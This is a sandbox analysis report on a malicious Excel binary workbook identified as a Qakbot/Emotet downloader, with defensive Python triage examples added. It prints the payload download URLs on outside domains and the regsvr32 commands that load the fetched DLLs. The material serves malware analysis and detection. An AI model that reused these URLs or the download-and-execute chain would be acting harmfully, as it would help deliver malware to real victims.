Summary | ZeroBOX

W-160957625.xlsb

Tags: Malicious Library, Excel Binary Workbook file format (xlsb), ZIP Format
Category FILE
Machine s1_win7_x6401
Started March 24, 2025, 9:31 p.m.
Completed March 24, 2025, 9:33 p.m.
Size 1.0MB
Type Microsoft Excel 2007+
MD5 fdf2f291fa7b70ebea93d238db8aae1f
SHA256 c4a26d3389fd11c4bbc4a1771d88869d28eca8f19c802a7aa2b070bb6ea18378
CRC32 E1FC7FF7
ssdeep 24576:a9vBKAnpis3QXPH5sjl+opcMrAm9vBKAnpis3Q+9vBKAnpis3QSVLFUN:25KA65VSrX5KAV5KAVNFK
Yara
  • zip_file_format - ZIP file format
  • Malicious_Library_Zero - Malicious_Library
  • xlsb - Excel Binary Workbook file format detection
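The two format rules above (zip_file_format, xlsb) fire because an .xlsb is an OOXML ZIP container whose workbook part is binary. The following is an added example, not part of the ZeroBOX report or its Yara rules, that inspects such a container and lists the parts a triage script keys on. Assumptions not taken from the report: the xlsb check is modelled as ZIP structure plus the xl/workbook.bin part (or the xlsb main content type in [Content_Types].xml); the sample itself is not available here, so build_sample() constructs minimal containers in memory.

```python
"""Added example (not part of the ZeroBOX report or its Yara rules): inspect an
OOXML container the way the 'zip_file_format' and 'xlsb' hits imply, and list
the parts that matter for an Excel downloader.

Assumptions, not taken from the report: the xlsb test keys on ZIP structure plus
the binary workbook part xl/workbook.bin (or the xlsb main content type); the
real sample is not available here, so build_sample() constructs minimal
containers in memory that Excel itself would not open.
"""
import io
import zipfile

ZIP_MAGIC = b"PK\x03\x04"
CT_XLSB = "application/vnd.ms-excel.sheet.binary.macroEnabled.main"
CT_XLSX = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"


def classify_workbook(data: bytes) -> dict:
    """Return container facts a triage script would key on."""
    info = {
        "magic_at_0": data[:4] == ZIP_MAGIC,          # what a naive Yara magic check sees
        "is_zip": zipfile.is_zipfile(io.BytesIO(data)),  # central directory found
        "kind": None, "macrosheets": [], "has_vba": False, "content_type_xlsb": False,
    }
    if not info["is_zip"]:
        return info
    zf = zipfile.ZipFile(io.BytesIO(data))
    names = set(zf.namelist())
    if "xl/workbook.bin" in names:
        info["kind"] = "xlsb"
    elif "xl/workbook.xml" in names:
        info["kind"] = "xlsx"
    # Excel 4.0 macro sheets live under xl/macrosheets/ (.bin in xlsb, .xml in
    # xlsm); the "XLM" / "Macro40" detection names on this page refer to them.
    info["macrosheets"] = sorted(n for n in names if n.startswith("xl/macrosheets/"))
    info["has_vba"] = "xl/vbaProject.bin" in names
    if "[Content_Types].xml" in names:
        ct = zf.read("[Content_Types].xml").decode("utf-8", "replace")
        info["content_type_xlsb"] = CT_XLSB in ct
    return info


def build_sample(binary: bool, macrosheets: int) -> bytes:
    """Constructed minimal container for the demo (not a real workbook)."""
    wb = "xl/workbook.bin" if binary else "xl/workbook.xml"
    ct = CT_XLSB if binary else CT_XLSX
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("[Content_Types].xml",
                    f'<Types><Override PartName="/{wb}" ContentType="{ct}"/></Types>')
        zf.writestr(wb, b"\x00" * 16)
        ext = "bin" if binary else "xml"
        for i in range(1, macrosheets + 1):
            zf.writestr(f"xl/macrosheets/sheet{i}.{ext}", b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("xlsb with macrosheets", build_sample(True, 2)),
                        ("plain xlsx", build_sample(False, 0)),
                        ("not a zip", b"MZ\x90\x00")):
        print(label, classify_workbook(blob))
```

A magic check at offset 0 is what a format rule usually does, but a ZIP can carry leading bytes; zipfile.is_zipfile locates the end-of-central-directory record instead, so the two fields can disagree on a prefixed container. The interesting result for a sample like this one is kind == "xlsb" together with a non-empty macrosheets list.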

IP Address Status Action
162.241.62.76 Active Moloch
164.124.101.2 Active Moloch
185.151.30.185 Active Moloch

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

status: 1  return: 1  repeated: 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f5b1000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f60f000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f60f000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f551000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76161000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75e61000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75d41000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f4a1000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f481000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f471000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x730d1000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f451000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f441000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f401000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f3f1000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtProtectVirtualMemory

process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f3b1000
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtAllocateVirtualMemory

process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08c60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtAllocateVirtualMemory

process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x08c60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtAllocateVirtualMemory

process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x09190000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0

NtAllocateVirtualMemory

process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x091a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
status: 1  return: 0  repeated: 0
file C:\Uduw\ehxw2.dll
file C:\Uduw\ehxw1.dll
file C:\Uduw\ehxw3.dll
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000328
filepath: C:\Users\test22\AppData\Local\Temp\~$W-160957625.xlsb
desired_access: 0xc0110080 (GENERIC_READ|GENERIC_WRITE|SYNCHRONIZE|DELETE|FILE_READ_ATTRIBUTES)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$W-160957625.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
status: 1  return: 0  repeated: 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000410
filepath: C:\Users\test22\AppData\Local\Temp\~$W-160957625.xlsb
desired_access: 0xc0110080 (GENERIC_READ|GENERIC_WRITE|SYNCHRONIZE|DELETE|FILE_READ_ATTRIBUTES)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$W-160957625.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
status: 1  return: 0  repeated: 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000041c
filepath: C:\Users\test22\AppData\Local\Temp\~$W-160957625.xlsb
desired_access: 0xc0110080 (GENERIC_READ|GENERIC_WRITE|SYNCHRONIZE|DELETE|FILE_READ_ATTRIBUTES)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$W-160957625.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
status: 1  return: 0  repeated: 0
cmdline regsvr32 C:\Uduw\ehxw2.dll
cmdline regsvr32 C:\Uduw\ehxw1.dll
cmdline regsvr32 C:\Uduw\ehxw3.dll
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png
stack_pivoted: 0
filepath_r: C:\Uduw\ehxw1.dll
filepath: C:\Uduw\ehxw1.dll
status: failed  return: 2148270085 (0x800C0005, INET_E_RESOURCE_NOT_FOUND)  repeated: 0

URLDownloadToFileW

url: https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png
stack_pivoted: 0
filepath_r: C:\Uduw\ehxw2.dll
filepath: C:\Uduw\ehxw2.dll
status: failed  return: 2148270085 (0x800C0005, INET_E_RESOURCE_NOT_FOUND)  repeated: 0

URLDownloadToFileW

url: https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png
stack_pivoted: 0
filepath_r: C:\Uduw\ehxw3.dll
filepath: C:\Uduw\ehxw3.dll
status: failed  return: 2148270085 (0x800C0005, INET_E_RESOURCE_NOT_FOUND)  repeated: 0
parent_process excel.exe martian_process regsvr32 C:\Uduw\ehxw2.dll
parent_process excel.exe martian_process regsvr32 C:\Uduw\ehxw1.dll
parent_process excel.exe martian_process regsvr32 C:\Uduw\ehxw3.dll
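The memory, download and process rows above are the whole chain: RWX pages inside Excel, three URLDownloadToFileW calls that fetch a ".png" URL into a ".dll" path under C:\Uduw, and regsvr32 launched by excel.exe on each of those paths. The following is an added example, not ZeroBOX code, that triages records of that shape. RECORDS is transcribed by hand from the report entries (one memory call of each kind, the owner-file NtCreateFile, the three downloads, the three regsvr32 children) with field names mirroring the report's labels; the "process" pseudo-record, the finding categories and the TRUSTED_DLL_DIRS list are this example's own assumptions.

```python
"""Added example, not ZeroBOX code: triage the API records this report lists.

RECORDS is transcribed by hand from the report entries above; the field names
mirror the report's labels. The "process" pseudo-record shape, the finding
categories and TRUSTED_DLL_DIRS are this example's own assumptions.
"""
import ntpath
import posixpath
from urllib.parse import urlparse

# urlmon HRESULTs (facility 0x00C) that URLDownloadToFileW returns.
URLMON_ERRORS = {
    0x800C0002: "INET_E_INVALID_URL",
    0x800C0003: "INET_E_NO_SESSION",
    0x800C0004: "INET_E_CANNOT_CONNECT",
    0x800C0005: "INET_E_RESOURCE_NOT_FOUND",
    0x800C0006: "INET_E_OBJECT_NOT_FOUND",
    0x800C0007: "INET_E_DATA_NOT_AVAILABLE",
    0x800C0008: "INET_E_DOWNLOAD_FAILURE",
}
PAGE_EXECUTE_READWRITE = 0x40   # the report's "protection: 64"
FILE_DELETE_ON_CLOSE = 0x1000   # one bit of the report's "create_options"
# Where a regsvr32 target would normally live (assumption for this example).
TRUSTED_DLL_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\program files")

RECORDS = [  # transcribed from the report
    {"api": "NtProtectVirtualMemory", "protection": 64, "length": 4096,
     "base_address": 0x6F5B1000},
    {"api": "NtAllocateVirtualMemory", "protection": 64, "region_size": 4096,
     "base_address": 0x08C60000},
    {"api": "NtCreateFile", "create_options": 4198496,
     "filepath": r"C:\Users\test22\AppData\Local\Temp\~$W-160957625.xlsb"},
    {"api": "URLDownloadToFileW", "return": 2148270085, "filepath": r"C:\Uduw\ehxw1.dll",
     "url": "https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png"},
    {"api": "URLDownloadToFileW", "return": 2148270085, "filepath": r"C:\Uduw\ehxw2.dll",
     "url": "https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png"},
    {"api": "URLDownloadToFileW", "return": 2148270085, "filepath": r"C:\Uduw\ehxw3.dll",
     "url": "https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png"},
    {"api": "process", "parent": "excel.exe", "cmdline": r"regsvr32 C:\Uduw\ehxw2.dll"},
    {"api": "process", "parent": "excel.exe", "cmdline": r"regsvr32 C:\Uduw\ehxw1.dll"},
    {"api": "process", "parent": "excel.exe", "cmdline": r"regsvr32 C:\Uduw\ehxw3.dll"},
]


def decode_hresult(code: int) -> str:
    """Render a URLDownloadToFileW return value; 0 is S_OK."""
    if code == 0:
        return "S_OK"
    return f"0x{code:08X} ({URLMON_ERRORS.get(code, 'unknown')})"


def triage(records):
    """Return (category, detail) findings in the order they are derived."""
    # Pass 1: what the sample tried to fetch, keyed by the target path.
    fetched = {r["filepath"].lower(): r["return"]
               for r in records if r["api"] == "URLDownloadToFileW"}
    findings, rwx_pages = [], 0
    for r in records:
        api = r["api"]
        if api in ("NtAllocateVirtualMemory", "NtProtectVirtualMemory"):
            if r["protection"] == PAGE_EXECUTE_READWRITE:
                rwx_pages += r.get("region_size", r.get("length", 0)) // 4096
        elif api == "NtCreateFile":
            name = ntpath.basename(r["filepath"])
            if name.startswith("~$") and r["create_options"] & FILE_DELETE_ON_CLOSE:
                # Excel's hidden owner/lock file: expected whenever a workbook opens.
                findings.append(("owner-file", name))
        elif api == "URLDownloadToFileW":
            url_ext = posixpath.splitext(urlparse(r["url"]).path)[1].lower()
            file_ext = ntpath.splitext(r["filepath"])[1].lower()
            if url_ext != file_ext:   # served as .png, saved as .dll
                findings.append(("ext-mismatch",
                                 f"{r['url']} -> {r['filepath']} [{decode_hresult(r['return'])}]"))
        elif api == "process":
            parts = r["cmdline"].split(maxsplit=1)
            if parts[0].lower() == "regsvr32" and len(parts) == 2:
                dll = parts[1].strip('"').lower()
                if not dll.startswith(TRUSTED_DLL_DIRS):
                    findings.append(("office-regsvr32", f"{r['parent']} -> {r['cmdline']}"))
                if dll in fetched:   # tie the child back to the download that should feed it
                    findings.append(("stage-2-linked",
                                     f"{dll} fetched with {decode_hresult(fetched[dll])}"))
    if rwx_pages:
        findings.append(("rwx-memory", f"{rwx_pages} page(s) set PAGE_EXECUTE_READWRITE"))
    return findings


if __name__ == "__main__":
    for category, detail in triage(RECORDS):
        print(f"[{category}] {detail}")
```

Two caveats the decode makes visible: every download returned 0x800C0005 (INET_E_RESOURCE_NOT_FOUND), so the second stage never arrived in this run and the regsvr32 children had nothing to load, which is why the RWX pages here reflect only the Excel-side loader; and the hidden, delete-on-close ~$ file is Excel's ordinary owner file, reported as "owner-file" so it is not mistaken for a dropped artifact.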
Lionic Trojan.Script.Generic.4!c
ClamAV Xls.Downloader.Emotet-OOXML_XL-af43432fbcb8603c-9980048-0
CAT-QuickHeal XML.Downloader.46545.GC
McAfee X97M/Downloader.oy
VIPRE Trojan.Agent.FVAR
Sangfor Malware.Generic-XLM.Save.Emotet_ma35
BitDefender Trojan.Agent.FVAR
Arcabit Trojan.Agent.FVAR [many]
Cyren XF/Agent.BF.gen!Eldorado
Symantec Scr.MalMacro!gen3
ESET-NOD32 multiple detections
Avast VBS:Malware-gen
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.MSOffice.Generic
Alibaba TrojanDownloader:VBA/MalDoc.ali1000101
MicroWorld-eScan Trojan.Agent.FVAR
Rising Trojan.Generic/XLM@AI.100 (RDM.XLM:UUeJZLoxW8Y1ZgarvdkS2A)
Emsisoft Trojan-Downloader.Macro.Generic.DG (A)
F-Secure Malware.W97M/Dldr.Quakbot.JS
DrWeb X97M.DownLoader.974
TrendMicro Possible_SMXFQAKBOTYXCDH1
McAfee-GW-Edition X97M/Downloader.oy
FireEye Trojan.Agent.FVAR
Sophos Troj/DocDl-AFYL
Ikarus Trojan-Downloader.O97M.Qakbot
Avira W97M/Dldr.Quakbot.JS
Microsoft TrojanDownloader:O97M/Qakbot.IQAY!MTB
ZoneAlarm HEUR:Trojan.MSOffice.Generic
GData Macro.Trojan-Downloader.Agent.BDH
Google Detected
Tencent Trojan.MsOffice.Macro40.11020301
Fortinet MSExcel/Agent.AC!tr.dldr
AVG VBS:Malware-gen